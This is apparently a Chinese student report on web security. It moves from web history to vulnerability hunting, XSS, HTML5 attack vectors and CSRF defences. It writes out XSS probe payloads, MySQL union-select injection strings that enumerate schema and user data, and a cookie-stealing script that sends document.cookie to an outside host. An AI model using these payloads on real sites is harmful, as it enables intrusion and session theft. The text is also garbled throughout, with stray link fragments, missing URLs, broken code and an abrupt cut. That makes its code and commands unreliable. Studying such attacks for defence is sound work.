Web前端認(rèn)識(shí)和理解

Web前端認(rèn)識(shí)和理解Web前端認(rèn)識(shí)和理解/Web前端認(rèn)識(shí)和理解Web前端認(rèn)識(shí)班級(jí)：姓名：夏維；王波學(xué)號(hào):2011211830；2011211832授課教師：董濤對(duì)Web前端的認(rèn)識(shí)由于網(wǎng)絡(luò)技術(shù)日趨成熟，黑客們也將注意力從以往對(duì)網(wǎng)絡(luò)服務(wù)器的攻擊逐步轉(zhuǎn)移到了對(duì)Web應(yīng)用的攻擊上。根據(jù)Gartner的最新調(diào)查,信息安全攻擊有75%都是發(fā)生在Web應(yīng)用而非網(wǎng)絡(luò)層面上。同時(shí)，數(shù)據(jù)也顯示，三分之二的Web站點(diǎn)都相當(dāng)脆弱，易受攻擊。然而現(xiàn)實(shí)確是，絕大多數(shù)企業(yè)將大量的投資花費(fèi)在網(wǎng)絡(luò)和服務(wù)器的安全上，沒(méi)有從真正意義上保證Web應(yīng)用本身的安全，給黑客以可乘之機(jī)。一、Web的介紹web的起源Web是WorldWideWeb的簡(jiǎn)稱，中文稱之為萬(wàn)維網(wǎng),是用于發(fā)布、瀏覽、查詢信息的網(wǎng)絡(luò)信息服務(wù)系統(tǒng),由許多遍布在不同地域內(nèi)的Web服務(wù)器有機(jī)地組成Web架構(gòu)的精妙處從技術(shù)層面上看，Web架構(gòu)的精華有三處：用超文本技術(shù)(HTML）實(shí)現(xiàn)信息及信息的連接;用統(tǒng)一資源定位技術(shù)（URL)實(shí)現(xiàn)全球信息的精確定位；用新的應(yīng)用層協(xié)議(HTTP）實(shí)現(xiàn)分布式的信息共享。Web技術(shù)涉及的技術(shù)Web是一種典型的分布式應(yīng)用架構(gòu)。Web應(yīng)用中的每一次信息交換都要涉及到客戶端和服務(wù)端兩個(gè)層面.因此，Web開(kāi)發(fā)技術(shù)大體上也可以被分為客戶端技術(shù)和服務(wù)端技術(shù)兩大類。（1)客戶端技術(shù)①HTML語(yǔ)言的誕生Web客戶端的主要任務(wù)是展現(xiàn)信息內(nèi)容，HTML語(yǔ)言是信息展現(xiàn)的最有效載體之一。作為一種實(shí)用的超文本語(yǔ)言，1990年,第一個(gè)圖形化的Web瀏覽器”WorldWideWeb”終于可以使用一種為Web度身定制的語(yǔ)言—-HTML來(lái)展現(xiàn)超文本信息了。②從靜態(tài)信息到動(dòng)態(tài)信息最初的HTML語(yǔ)言只能在瀏覽器中展現(xiàn)靜態(tài)的文本或圖像信息，隨后由靜態(tài)技術(shù)向動(dòng)態(tài)技術(shù)逐步轉(zhuǎn)變。1997年,Microsoft發(fā)布了IE4。0,并將動(dòng)態(tài)HTML標(biāo)記、CSS和動(dòng)態(tài)對(duì)象模型發(fā)展成了一套完整、實(shí)用、高效的客戶端開(kāi)發(fā)技術(shù)體系，Microsoft稱其為DHTML。同樣是實(shí)現(xiàn)HTML頁(yè)面的動(dòng)態(tài)效果，DHTML技術(shù)無(wú)需啟動(dòng)Java虛擬機(jī)或其他腳本環(huán)境，可以在瀏覽器的支持下，獲得更好的展現(xiàn)效果和更高的執(zhí)行效率。為了在HTML頁(yè)面中實(shí)現(xiàn)音頻、視頻等更為復(fù)雜的多媒體應(yīng)用,又引入了對(duì)QuickTime插件的支持。Realplayer插件、Microsoft自己的媒體播放插件MediaPlayer也被預(yù)裝到了各種Windows版本之中。隨后Flash插件的橫空出世。(2）服務(wù)端技術(shù)及客戶端技術(shù)從靜態(tài)向動(dòng)態(tài)的演進(jìn)過(guò)程類似，Web服務(wù)端的開(kāi)發(fā)技術(shù)也是由靜態(tài)向動(dòng)態(tài)逐漸發(fā)展、完善起來(lái)的.二、漏洞挖掘

漏洞挖掘技術(shù)一直是網(wǎng)絡(luò)攻擊者最感興趣的問(wèn)題，漏洞挖掘的范圍也在隨著技術(shù)的提升而有所變化.在前期針對(duì)緩沖區(qū)溢出格式化字符串堆溢出lib庫(kù)溢出等技術(shù)都是針對(duì)ELF文件或者PE文件的漏洞挖掘技術(shù)。在針對(duì)ELF文件PE文件如＊.exe及*。dl的漏洞挖掘過(guò)程中,出現(xiàn)了很多的漏洞挖掘技術(shù),但是針對(duì)PE文件ELF文件的漏洞挖掘始終停留在了黑盒測(cè)試（包括單元黑盒測(cè)試）源代碼審計(jì)等辦法.通過(guò)RATS等源代碼審計(jì)軟件可以找到部分源代碼級(jí)別的漏洞信息，但是畢竟源代碼審計(jì)軟件尋找的多數(shù)為strcpymemcpy等存在緩沖區(qū)溢出遺患的C函數(shù)，所以通過(guò)審計(jì)源代碼的辦法來(lái)進(jìn)行漏洞挖掘是一個(gè)可能性系數(shù)很小的漏洞挖掘技術(shù),而針對(duì)軟件的黑盒子測(cè)試雖然也能找到一些軟件的漏洞，但可能性系數(shù)也會(huì)較小,在國(guó)外的一些進(jìn)行漏洞挖掘的辦法已經(jīng)慢慢的提升為自己寫(xiě)黑盒子測(cè)試代碼,然后針對(duì)系統(tǒng)或軟件的某個(gè)功能模塊進(jìn)行模塊化的漏洞挖掘技術(shù)。例如Linux內(nèi)核的很多漏洞都是通過(guò)fuzzing技術(shù)找到的，fuzzing即模糊測(cè)試的意思,大家可以理解為類似SQL盲注入類型的攻擊技術(shù)。網(wǎng)絡(luò)安全的界限在不斷的提升,目前緩沖區(qū)溢出漏洞已經(jīng)如MSSQL注入般的被很多人堵死,而在進(jìn)行網(wǎng)絡(luò)入侵滲透的過(guò)程中，很多人滲透成功的著力點(diǎn)都是通過(guò)WEB開(kāi)始的,當(dāng)然有些人是通過(guò)MSSQL注入,有些人通過(guò)其它的WEB漏洞技術(shù)一步步的走到了入侵成功的步驟。我們下面將會(huì)討論一些WEB漏洞挖掘的簡(jiǎn)單技術(shù),通過(guò)這些簡(jiǎn)單技術(shù)的規(guī)則,然后配合經(jīng)驗(yàn)的提高,大家或許會(huì)得到意想不到的效果.WEB漏洞的分類1、SQL注入

SQL注入漏洞,是依靠存在弱點(diǎn)的WEB腳本代碼,來(lái)實(shí)現(xiàn)通過(guò)瀏覽器執(zhí)行任意SQL語(yǔ)句，從而實(shí)現(xiàn)最終獲取某種權(quán)限的攻擊技術(shù)。SQL注入的關(guān)鍵部分在于對(duì)元數(shù)據(jù)的利用，所謂元數(shù)據(jù)即數(shù)據(jù)庫(kù)的基礎(chǔ)數(shù)據(jù)。例如我們可以通過(guò)database（)version（）來(lái)獲得數(shù)據(jù)庫(kù)的名稱及版本，而我們通過(guò)SQL內(nèi)置函數(shù)獲得的這些內(nèi)容都屬于數(shù)據(jù)庫(kù)元數(shù)據(jù)的內(nèi)容。理解了元數(shù)據(jù)的概念,在后面的章節(jié)我會(huì)給大家簡(jiǎn)單的講解下通過(guò)元數(shù)據(jù)來(lái)獲取MySQL的數(shù)據(jù)表.2、文件包含類型,如PHP的的遠(yuǎn)程本地文件包含漏洞

文件包含漏洞是PHP程序特有的一個(gè)弱點(diǎn)攻擊,原理就是在使用include時(shí)沒(méi)有安全的編程，而能夠找到文件包含漏洞則是入侵一個(gè)WEB系統(tǒng)的很重要的因素,有了文件包含漏洞則可以很快速的達(dá)到上傳WEBSHELL，然后本地提升權(quán)限的作用.3、XSS

XSS漏洞是被很多人遺忘的漏洞，但是XSS也是一個(gè)比較危險(xiǎn)的安全隱患，我看到很多國(guó)內(nèi)介紹XSS漏洞的文章大部分在如何欺騙管理員獲得后臺(tái)登陸帳戶或者管理員的cookies文件.但這些僅僅是XSS漏洞的簡(jiǎn)單用法,如果尋找到的XSS漏洞可以任意執(zhí)行任Javascript腳本,那安全性也是不容忽視的。通過(guò)Javascript腳本其實(shí)也可以做一些惡意的攻擊,甚至可以獲得一些WEB程序的源代碼，當(dāng)然這個(gè)要看大家對(duì)Javascript腳本的熟悉程度。例如我們這幾天公布的這個(gè)可跨站執(zhí)行任意Javascript腳本的漏洞，最后我也通過(guò)這個(gè)漏洞給客戶演示了如何獲取他們的服務(wù)器信息，并最終實(shí)現(xiàn)得到其一定權(quán)限的方法。同時(shí)例如session騙cookies欺騙,目前我也把這些規(guī)入了XSS漏洞的范圍,當(dāng)然僅僅研究這兩個(gè)技術(shù)也是很值得大家去深入的進(jìn)行漏洞挖掘的。二、WEB漏洞挖掘規(guī)則漏洞挖掘規(guī)則需要一個(gè)WEB瀏覽器，如IEFirefox等即可，無(wú)需讀取WEB程序的源代碼,只要某個(gè)規(guī)則符合了漏洞規(guī)則的要求，即可以采取相關(guān)的漏洞攻擊技術(shù)進(jìn)行相應(yīng)的漏洞攻擊辦法例如：

<script>alert("111”）</script>,如果對(duì)方的代碼過(guò)濾了”雙引號(hào)，那么可以通過(guò)<script〉alert（’111’)〈/script>,采用'單引號(hào)測(cè)試,若單引號(hào)也過(guò)濾呢？OK,我們這樣來(lái)測(cè)試<script〉alert(111）</script>,使用數(shù)字提交,這樣測(cè)試XSS的漏洞就擴(kuò)展到了三條，通過(guò)構(gòu)造HTML語(yǔ)句來(lái)實(shí)現(xiàn)XSS漏洞的挖掘等等.XSS的漏洞挖掘規(guī)則〈script>alert（"111”)</script〉<script>alert（'111’）〈/script〉

<script〉alert（111)</script〉

〈body+onload=alert（"1111”)〉

<body+onload=alert(’1111'）〉

<body+onload=alert(1111)>

〈img+src=（"1111”）>

<img+src=（’1111')>

<img+src=（1111)〉

<"

<’

〈

<!——

〉

<!——

—->使用上面的這些簡(jiǎn)單漏洞規(guī)則,如果模糊測(cè)試一些站點(diǎn)的話，可以找到一些XSS漏洞。

下面的這四個(gè)語(yǔ)句判斷是否存在mysql注入,其中'號(hào)類型的測(cè)試已經(jīng)不是很可行,特別在PHP5和mysql5的環(huán)境下：)'

and1=1HYPERLINK”/t％20”

and1=2

orderby4//4為判斷該表的列數(shù)，直到猜測(cè)到為止下面的語(yǔ)句來(lái)獲取mysql的一些信息,這里我們假設(shè)我們使用orderby語(yǔ)句判斷出的列數(shù)為4HYPERLINK”/t%20”

and1=1unionselect1，2,3，4HYPERLINK

and1=1unionselectversion(），database(），user(）,4/t%20”

and1=1unionselectversion(）/*HYPERLINK”/t%20”

and1=1unionselectdatabse（）/*猜測(cè)表名:

and1=1unionselecttable_schema,table_name，table_rows,table_countfrominformation_schema.tables//上面使用數(shù)據(jù)庫(kù)的元數(shù)據(jù)來(lái)獲取mysql的信息,前提是系統(tǒng)管理員沒(méi)有禁止mysql普通用戶對(duì)元數(shù)據(jù)庫(kù)的表查詢,如果禁止了則該辦法是無(wú)效的。在開(kāi)始分析mysql數(shù)據(jù)庫(kù)到底可以執(zhí)行到那種程度的注入情況下分析了mysql的系統(tǒng)架構(gòu),最終發(fā)現(xiàn)通過(guò)information_schema數(shù)據(jù)庫(kù)提供給mysql用戶的元數(shù)據(jù)可以得到一些mysql數(shù)據(jù)庫(kù)的基本信息,例如得到數(shù)據(jù)庫(kù)的各個(gè)表信息等,還可以得到數(shù)據(jù)庫(kù)的權(quán)限設(shè)置等信息，information_schema數(shù)據(jù)庫(kù)用到的表的具體字段1：KEY_COLUMN_USAGE表constraint_schema：存放數(shù)據(jù)庫(kù)名table_schema:存放數(shù)據(jù)庫(kù)名table_name：存放數(shù)據(jù)庫(kù)表信息column_name:存放數(shù)據(jù)庫(kù)的字段信息,一般可以獲取第一個(gè)字段或者自增字段的信息2：SCHEMA表schema_name：存放數(shù)據(jù)庫(kù)名default_charater_set_name：存放charset類型default_collation_name：存放charset相關(guān)信息3:SCHEMA_PRIVILEGES表grantee：存放數(shù)據(jù)庫(kù)用戶名table_schema：表名privilege_type：權(quán)限4：STATISTICS表table_schema:存放數(shù)據(jù)庫(kù)名table_name:存放表名index_schema:數(shù)據(jù)庫(kù)名index_name:是否縮引column_name:存放索引自增字段5：TABLES表table_schema:存放數(shù)據(jù)庫(kù)名table_name：存放表名table_type:表類型SYSTEMorBASETABLEengin：MEMORYMYISAMInnoDBversion:table_rows:表的行數(shù)auto_increment：自增的總行數(shù)create_time:創(chuàng)建表的時(shí)間update_time:更新表的時(shí)間create_options:創(chuàng)建表時(shí)的約束條件有了這些以后,如果對(duì)方系統(tǒng)管理員忽略了這些,則可以達(dá)到我們不需要猜測(cè)表名而直接獲取數(shù)據(jù)庫(kù)表名的結(jié)果.

猜測(cè)列名:

HYPERLINK”/t%20”

and1=1unionselectusername，2,3，4fromuserwhere1=2按照這個(gè)規(guī)則依次類推，如果我們猜測(cè)到user表存在username字段，則程序執(zhí)行是正常的,否則程序會(huì)出錯(cuò),也可以使用where1=1來(lái)打印表的信息,通過(guò)這樣的辦法就可以獲取mysql數(shù)據(jù)庫(kù)的某些關(guān)鍵表的字段信息，如：admin及password:)C：文件包含漏洞

文件包含漏洞的測(cè)試,有以下幾個(gè)比較簡(jiǎn)單且有效的辦法。1：新建一個(gè)簡(jiǎn)單的php代碼，如：〈？phpinfo（)；?>,保存為*。txt格式2:新建一個(gè)簡(jiǎn)單的php代碼,如：〈?phpinfo（）;?>，保存為無(wú)后綴格式然后我們測(cè)試時(shí)只需要采取下面簡(jiǎn)單的辦法即可,這里我們假設(shè)我們下面的文件URL為HYPERLINK”/t%20"漏洞規(guī)則/t%20"HYPERLINKHYPERLINK”/t%20"使用上面的簡(jiǎn)單規(guī)則即可實(shí)現(xiàn)文件包含漏洞的測(cè)試,當(dāng)然得根據(jù)具體的返回信息來(lái)判斷.例如從XSS漏洞的檢測(cè)規(guī)則可能會(huì)發(fā)現(xiàn)包含文件漏洞，如果知道PHP的某個(gè)函數(shù)存在緩沖區(qū)溢出，我們假設(shè)這個(gè)PHP的內(nèi)置函數(shù)為phphtml(char＊str）,假設(shè)/t％20"(n為觸發(fā)漏洞的最大字符數(shù))當(dāng)然類似這樣的漏洞是需要寫(xiě)程序來(lái)自動(dòng)運(yùn)行的,然后來(lái)觸發(fā)溢出并執(zhí)行shellcode。但這里也存在一個(gè)問(wèn)題，即一般情況下，類似PHP本身的溢出漏洞的利用是有些難度存在的。三：XSS的概述最重要的要了解XSS漏洞的是，他們是目前為止發(fā)現(xiàn)的，在所有網(wǎng)站超過(guò)80％比例的定制Web應(yīng)用程序中最常見(jiàn)的漏洞。雖然跨站點(diǎn)腳本在一段時(shí)間內(nèi)一直被認(rèn)為是中等程度的的漏洞，但XSS蠕蟲(chóng)和病毒的出現(xiàn)，已經(jīng)提高了XSS的評(píng)估.軟件開(kāi)發(fā)人員和安全專業(yè)人員需要知道它是多么簡(jiǎn)單,以防止代碼開(kāi)發(fā)過(guò)程中出現(xiàn)XSS漏洞,并且一經(jīng)查出，他們是多么容易解決。XSS是一種攻擊技術(shù),它使得一個(gè)網(wǎng)站，寫(xiě)出攻擊者提供的可執(zhí)行代碼，然后加載在用戶的Web瀏覽器。也就是說(shuō)，當(dāng)黑客使用存在漏洞的網(wǎng)站作為攻擊的通道時(shí),用戶是預(yù)定的受害者。1、非持久性xss想想看,一個(gè)黑客想使用“"網(wǎng)站對(duì)用戶進(jìn)行XSS攻擊。黑客會(huì)采取的第一個(gè)步驟是在找出一個(gè)XSS漏洞，然后構(gòu)造一個(gè)特制的URL，也被稱為鏈接.要做到這一點(diǎn)，黑客會(huì)搜尋網(wǎng)站上的客戶端提供的數(shù)據(jù)可以被發(fā)送到Web服務(wù)器,然后回顯到屏幕上的任何功能,比如搜索框。常見(jiàn)的在線發(fā)布的博客。XSS漏洞往往出現(xiàn)在搜索框表單.在搜索字段中輸入“testsearch”，響應(yīng)頁(yè)面將用戶輸入的文本在顯示在三個(gè)不同的位置，查詢字符串中包含值為“test+search”的“search”參數(shù)。這個(gè)URL值可以在運(yùn)行時(shí)更改,甚至包括HTML/JavaScript的內(nèi)容。，其3展示了原來(lái)的搜索詞被替換為下面的HTML/JavaScript代碼時(shí)會(huì)發(fā)生什么：Example1。">〈SCRIPT>alert(‘XSS%20Testing'）〈/SCRIPT>結(jié)果頁(yè)面彈出了一個(gè)無(wú)害的警告對(duì)話框。根據(jù)提示,提交的代碼已經(jīng)成為web頁(yè)面的一部分，證明了JavaScript已進(jìn)入到的上下文并得到執(zhí)行。其4展示了夾雜有新的HTML/JavaScript代碼的Web頁(yè)面的HTML源代碼。其3,原來(lái)的搜索詞將被替換為HTML/JavaScript代碼.其4，夾雜有新的HTML/JavaScript代碼的Web頁(yè)面的HTML源代碼。此時(shí)，黑客將會(huì)繼續(xù)修改這個(gè)URL，包含更復(fù)雜的XSS攻擊來(lái)利用用戶。一個(gè)典型的例子是一個(gè)簡(jiǎn)單的cookie盜竊的攻擊。Example2?！啊?lt;SCRIPT>var+img=new+Image（)；img。src=”/”%20+％20document。cookie;</SCRIPT〉前面的JavaScript代碼創(chuàng)建一個(gè)圖像DOM（文檔對(duì)象模型）對(duì)象。varimg=newImage();因?yàn)镴avaScript代碼在“”上下文中執(zhí)行，所以它可以訪問(wèn)cookie數(shù)據(jù)。document.cookie;圖形對(duì)象然后指派一個(gè)外域的URL發(fā)送帶有Web瀏覽器的Cookie字符串的數(shù)據(jù)到“”。img。src=”/”+document.cookie；下面是一個(gè)例子,是一個(gè)被發(fā)送的HTTP請(qǐng)求。Example3。GETHTTP/1.1Host：hostUser—Agent：Firefox/1.5。0。1Content-length:0一旦黑客完成了他的攻擊代碼，他會(huì)通過(guò)垃圾郵件，留言板的帖子，即時(shí)消息和其他方法宣傳這種特制的鏈接，試圖吸引用戶點(diǎn)擊。是什么讓這種攻擊這么有效？用戶可能點(diǎn)擊正常的網(wǎng)絡(luò)釣魚(yú)郵件7中的鏈接是因?yàn)檫@個(gè)URL包含了真正的網(wǎng)站域名，而不是一種外觀相似的域名或隨機(jī)的IP地址.應(yīng)當(dāng)注意的是，過(guò)長(zhǎng)的XSS鏈接可以使用URL縮短服務(wù)，如TinyURL.com進(jìn)行偽裝.2、持久型XSS持久型XSS攻擊最常發(fā)生在由社區(qū)內(nèi)容驅(qū)動(dòng)的網(wǎng)站或Web郵件網(wǎng)站，不需要特制的鏈接來(lái)執(zhí)行。黑客僅僅需要提交XSS漏洞利用代碼到一個(gè)網(wǎng)站上其他用戶可能訪問(wèn)的地方。這些地區(qū)可能是博客評(píng)論，用戶評(píng)論,留言板，聊天室，HTML電子郵件，wikis，和其他的許多地方。一旦用戶訪問(wèn)受感染的網(wǎng)頁(yè),執(zhí)行是自動(dòng)的。這使得持續(xù)性的XSS的危險(xiǎn)性比非持久性高，因?yàn)橛脩魶](méi)有辦法保護(hù)自己。一旦黑客成功在某個(gè)頁(yè)面注入了漏洞利用代碼，他將宣傳受感染頁(yè)面的URL來(lái)希望不知情的用戶中招。即使用戶對(duì)非持續(xù)性XSS的URL懂得識(shí)別，也會(huì)很容易的受到影響.無(wú)論使用非持續(xù)性或持續(xù)性的XSS漏洞，黑客可以利用用戶，導(dǎo)致網(wǎng)絡(luò)和財(cái)務(wù)上的損失，有許多的方法.2、傳播的方法對(duì)于一個(gè)病毒或蠕蟲(chóng)想要成功，它需要一個(gè)執(zhí)行和傳播的方法.電子郵件病毒通常在鼠標(biāo)點(diǎn)擊后執(zhí)行，然后通過(guò)您的聯(lián)系人列表來(lái)發(fā)送帶有惡意軟件的的郵件進(jìn)行傳播。網(wǎng)絡(luò)蠕蟲(chóng)利用遠(yuǎn)程利用漏洞危害機(jī)器和并且通過(guò)連接到其他存在漏洞的主機(jī)進(jìn)行傳播。除傳播之外，蠕蟲(chóng)病毒還是高度多樣化，包括創(chuàng)造DDoS僵尸網(wǎng)絡(luò)，垃圾郵件僵尸，或遠(yuǎn)程鍵盤(pán)監(jiān)控的能力.XSS蠕蟲(chóng)及其他形式的惡意軟件相似，但以自己獨(dú)特的方式執(zhí)行和傳播。使用一個(gè)網(wǎng)站來(lái)存放惡意代碼，XSS蠕蟲(chóng)和病毒通過(guò)控制Web瀏覽器,使得它復(fù)制惡意軟件到網(wǎng)絡(luò)上的其他地方去感染別人來(lái)進(jìn)行傳播.例如,一個(gè)含有惡意軟件的博客評(píng)論，可以使用訪問(wèn)者的瀏覽器發(fā)布額外的感染性的博客評(píng)論.XSS蠕蟲(chóng)病毒可能會(huì)使得瀏覽器進(jìn)行發(fā)送電子郵件，轉(zhuǎn)賬，刪除/修改數(shù)據(jù)，入侵其他網(wǎng)站，下載非法內(nèi)容，以及許多其他形式的惡意活動(dòng)。用最簡(jiǎn)單的方式去理解，就是如果沒(méi)有適當(dāng)?shù)姆烙?在網(wǎng)站上的任何功能都可以在未經(jīng)用戶許可的情況下運(yùn)行。在最后一節(jié)中，我們將重點(diǎn)放在XSS漏洞本身，以及用戶可以怎么樣被利用。現(xiàn)在,我們來(lái)看XSS惡意軟件是如何可以進(jìn)行遠(yuǎn)程通信。XSS漏洞利用代碼，通常是HTML/JavaScript,使用三種方式使得瀏覽器發(fā)送遠(yuǎn)程HTTP請(qǐng)求的瀏覽器：嵌入式的HTML標(biāo)簽，JavaScriptDOM的對(duì)象，XMLHTTPRequest.3、嵌入式HTML標(biāo)簽一些HTML標(biāo)簽具有在頁(yè)面加載時(shí)會(huì)自動(dòng)發(fā)起Web瀏覽器的HTTP請(qǐng)求的屬性。有一個(gè)例子是IMG的SRC屬性。SRC屬性用于指定在Web頁(yè)面中顯示的圖像文件的URL地址.當(dāng)你的瀏覽器載入帶有IMG標(biāo)簽的網(wǎng)頁(yè)，圖像會(huì)自動(dòng)被請(qǐng)求,并在瀏覽器中顯示。但是，SRC屬性也可以被用于任何Web服務(wù)器的其他URL,不僅僅是包含圖像的.例如，如果我們進(jìn)行了谷歌搜索“WhiteHatSecurity”我們最終得到了下面的URL：這個(gè)URL可以很容易地取代IMG內(nèi)的SRC屬性的值，從而迫使您的Web瀏覽器中執(zhí)行相同的谷歌搜索。<imgsrc=”Search"〉顯然使得Web瀏覽器發(fā)送一個(gè)谷歌搜索請(qǐng)求是沒(méi)有什么危害性的.然而，URL構(gòu)建的同樣的過(guò)程可以用來(lái)使得Web瀏覽器自動(dòng)進(jìn)行銀行賬戶資金的匯款，發(fā)表煽動(dòng)性言論，甚至入侵網(wǎng)站.這一點(diǎn)可以說(shuō)明，這是一個(gè)迫使一個(gè)Web瀏覽器連接到其他網(wǎng)站，使的XSS蠕蟲(chóng)病毒傳播的機(jī)制。5、JavaScript和文檔對(duì)象模型JavaScript被用于給網(wǎng)站訪問(wèn)者一個(gè)豐富的、交互式的體驗(yàn)。這些網(wǎng)頁(yè)更接近于一個(gè)軟件應(yīng)用程序，而不是一個(gè)靜態(tài)的HTML文檔。我們常會(huì)看到JavaScript被用于進(jìn)行圖像的翻轉(zhuǎn)，動(dòng)態(tài)表單輸入檢查，彈出對(duì)話框，下拉菜單，拖動(dòng)和拖放等。JavaScript有接近完全的對(duì)網(wǎng)站上的每一個(gè)對(duì)象，包括圖像，cookies,窗口,框架和文本內(nèi)容的訪問(wèn)。這些對(duì)象中的每一個(gè)都是文檔對(duì)象模型的一部分。DOM提供了一系列JavaScript讀取和操作的應(yīng)用程序編程接口.類似嵌入式HTML標(biāo)簽的功能，JavaScript可以操縱DOM對(duì)象自動(dòng)發(fā)起Web瀏覽器的HTTP請(qǐng)求。圖像和窗口的源URL可以被重新指定為其他URL的。我們可以使用JavaScript來(lái)改變圖像的DOM對(duì)象SRC進(jìn)行谷歌搜索“WhiteHatSecurity”。img［0]。src=Search;迫使Web瀏覽器連接到其他網(wǎng)站發(fā)送一個(gè)谷歌搜索請(qǐng)求是一種無(wú)害的例子。但這也說(shuō)明了XSS惡意軟件傳播的另一種方法。四、HTML5安全五種可能會(huì)利用HTML5的功能進(jìn)行攻擊的方法：1、表單篡改:另一個(gè)新功能讓攻擊者可以在被注入JavaScript的網(wǎng)站（例如XSS攻擊)中更改該網(wǎng)頁(yè)上的表單行為。舉例來(lái)說(shuō)，攻擊者可以改變一個(gè)網(wǎng)絡(luò)商店的正常行為,不是將內(nèi)容送到購(gòu)買或是登錄頁(yè)面，而是將用戶的身分認(rèn)證信息發(fā)送到攻擊者自己的網(wǎng)站。2、利用地理定位追蹤受害者:地理定位是HTML5新功能中最受注目的一個(gè).因?yàn)榘踩碗[私的考慮，網(wǎng)站必須先得到用戶的批準(zhǔn)，隨后才能獲得位置訊息.然而就和以前出現(xiàn)過(guò)的其他功能一樣，例如Vista的用戶帳戶控制，Android的應(yīng)用程序權(quán)限，還有無(wú)效的HTTPS憑證等，這些需要用戶作決定的安全措施幾乎沒(méi)有任何效果。而一旦有了授權(quán),網(wǎng)站不僅可以知道受害者的位置,而且還可以在用戶移動(dòng)時(shí)對(duì)其進(jìn)行實(shí)時(shí)追蹤.3、利用桌面通知做社會(huì)工程學(xué)攻擊：我們?cè)贖TML5的五大優(yōu)秀功能文章中曾經(jīng)提到過(guò)HTML5的一個(gè)新功能：桌面通知.這些出現(xiàn)在瀏覽器之外的彈出窗口,其實(shí)是可以用HTML程序代碼進(jìn)行定制的。雖然這種功能帶來(lái)了很不錯(cuò)的交互方式，但也可能導(dǎo)致社會(huì)工程學(xué)攻擊，例如網(wǎng)絡(luò)釣魚(yú)或者假冒殺毒軟件等。看看下面的圖片就可以想象到,攻擊者可以如何利用這個(gè)新功能了。4、利用跨域請(qǐng)求或WebSockets的端口掃描:有了HTML5，瀏覽器現(xiàn)在可以連到任何IP地址或網(wǎng)站的（幾乎）任何端口.雖然除非目標(biāo)網(wǎng)站有特別的允許,不然并不能接收到來(lái)自任意端口連接的回應(yīng)，但是研究人員表示，這類請(qǐng)求所花的時(shí)間可以用來(lái)判斷目標(biāo)端口是打開(kāi)的還是關(guān)閉的。因此攻擊者就可以直接利用瀏覽器對(duì)受害者的內(nèi)部網(wǎng)絡(luò)進(jìn)行端口掃描。5、點(diǎn)擊劫持更加容易:點(diǎn)擊劫持本身不是種新的攻擊，這種攻擊的目的是竊取受害者的鼠標(biāo)按鈕點(diǎn)擊，然后將點(diǎn)擊定向到攻擊者所指定的其他頁(yè)面。攻擊者的目的是讓用戶在不知情的情況下點(diǎn)擊隱藏的鏈接。目前，對(duì)于點(diǎn)擊劫持最好的服務(wù)器端防御措施之一是被稱為Framekilling的技術(shù)。本質(zhì)上來(lái)說(shuō),受到影響的網(wǎng)站可以利用JavaScript來(lái)驗(yàn)證自己是否在一個(gè)iframe中運(yùn)行，如果是的話,就拒絕顯示頁(yè)面內(nèi)容。這種技術(shù)已經(jīng)被在用在Facebook、Gmail和其他一些網(wǎng)站中.但是HTML5在iframe中增加了一個(gè)新的沙盒屬性,該屬性會(huì)讓網(wǎng)站停止執(zhí)行JavaScript腳本。在大多數(shù)情況下,這其實(shí)是比較安全的做法,但也存在缺點(diǎn)，就是會(huì)抵消目前對(duì)點(diǎn)擊劫持最好的防御措施。五、CSRFCSRF是跨站請(qǐng)求偽造，也被稱為“oneclickattack”或者sessionriding，通?？s寫(xiě)為CSRF或者XSRF，是一種對(duì)網(wǎng)站的惡意利用。盡管聽(tīng)起來(lái)像跨站腳本，但它及XSS非常不同，并且攻擊方式幾乎相左。XSS利用站點(diǎn)內(nèi)的信任用戶，而CSRF則通過(guò)偽裝來(lái)自受信任用戶的請(qǐng)求來(lái)利用受信任的網(wǎng)站。及XSS攻擊相比,CSRF攻擊往往不大流行和難以防范,所以被認(rèn)為比XSS更具危險(xiǎn)性。即在某個(gè)惡意站點(diǎn)的頁(yè)面上，促使訪問(wèn)者請(qǐng)求你的網(wǎng)站的某個(gè)URL，從而達(dá)到改變服務(wù)器端數(shù)據(jù)的目的.這一類攻擊依賴于你的網(wǎng)頁(yè)中的表單，脆弱的表單很容易受到攻擊。對(duì)于你網(wǎng)站中的訪問(wèn)者而言，可能會(huì)受到以下攻擊：在你的網(wǎng)站之外記錄受攻擊者的日志（比如：Slashdot）；修改受攻擊者在你的網(wǎng)站的設(shè)置（比如：Google)；修改你的硬件防火墻；使用受攻擊者的登錄信息在你的網(wǎng)站中發(fā)表評(píng)論或留言；將資金轉(zhuǎn)移到另一個(gè)用戶帳號(hào)中。CSRF攻擊的典型是那些使用cookie記錄登錄信息的網(wǎng)站,但對(duì)于一些允許某個(gè)IP地址訪問(wèn)的頁(yè)面（如內(nèi)部網(wǎng)），這一類攻擊也會(huì)奏效.CSRF攻擊通常會(huì)使用到JavaScript（但不僅限于JavaScript)實(shí)現(xiàn)跨站點(diǎn)自動(dòng)提交表單－－表單數(shù)據(jù)可以隱藏，提交按鈕可以偽裝成鏈接或滾動(dòng)條。確定那些接受可改變服務(wù)器數(shù)據(jù)的CGI只接受POST參數(shù)，不接受GET參數(shù)，一些服務(wù)器端語(yǔ)言默認(rèn)同時(shí)接受兩種方式提交過(guò)來(lái)的參數(shù)；確定表單提交處理的是你自己的表單，可以使用一個(gè)隱藏字段中存放MD5字符串，此字符串是將登錄cookie數(shù)據(jù)及服務(wù)器端存放的密鑰進(jìn)行MD5之后的結(jié)果，只有這個(gè)MD5字符串正確時(shí)才接受表單數(shù)據(jù);另外還可以增加一個(gè)更為嚴(yán)格的方法：在表單中增加一個(gè)時(shí)間戳的隱藏字段,并將其包含到hash字符串中，如果時(shí)間戳超過(guò)某個(gè)時(shí)間，則認(rèn)為表單已過(guò)期。當(dāng)表單過(guò)期時(shí)，給出一個(gè)方法可以讓用戶重新提交表單，比如將用戶之前填寫(xiě)的數(shù)據(jù)依舊放入表單中，但使用一個(gè)新的hash字符串。一個(gè)PHP的表單例子，表單代碼：<？php$key=y8s4Z7m2;//MD5加密密鑰$time=time(）；//當(dāng)前時(shí)間＄hash=md5(＄time?！鏺ey)；//hash字符串？〈formmethod=”post”action="comment.php”〈pYourname：〈inputtype=”text”name=”person_name"/〈/p<pComment:/〈textareaname="comment"rows="10”cols="60”〈/textarea</p〈inputtype="hidden"name=”time”value=”<?phpecho$time;?"/<inputtype="hidden”name=”hash”value="〈？phpecho＄hash；？"/<p<inputtype="submit"name="comment"value="SubmitComment"/</p</form表單提交之后的comment。php后臺(tái)處理程序代碼：〈？php$key=y8s4Z7m2;//密鑰，及上面的一致$expire=1800;//表單過(guò